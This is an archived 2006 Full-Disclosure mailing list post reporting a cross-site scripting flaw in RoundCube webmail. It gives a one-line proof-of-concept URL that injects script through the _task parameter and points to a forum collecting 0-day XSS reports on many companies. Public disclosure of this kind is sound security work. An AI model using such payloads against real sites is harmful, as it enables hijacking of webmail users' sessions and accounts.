[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] XSS in roundcube.com and users of it

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] XSS in roundcube.com and users of it
From: RSnake <h@xxxxxxxxx>
Date: Sat, 11 Nov 2006 10:51:00 -0800

There is an XSS vulnerability in roundcube webmail:

http://demo.roundcube.net/?_task=');alert(%22XSS%22)//

Btw, we've been posting 0-day XSS vulnerabilities at 
http://sla.ckers.org/forum/list.php?3 to take it out of the full 
disclosure list since lots of people don't want to see the sheer volume 
of reports.  We've got close to a thousand companies and counting.  
We're just trying to cut down on the noise to people's inboxes.  That is 
all.

-RSnake
http://ha.ckers.org
http://sla.ckers.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] sun and their pathetic forum management (xss, etc)
Next by Date: [Full-disclosure] Old SAP exploits
Previous by thread: [Full-disclosure] sun and their pathetic forum management (xss, etc)
Next by thread: [Full-disclosure] Old SAP exploits
Index(es):
- Date
- Thread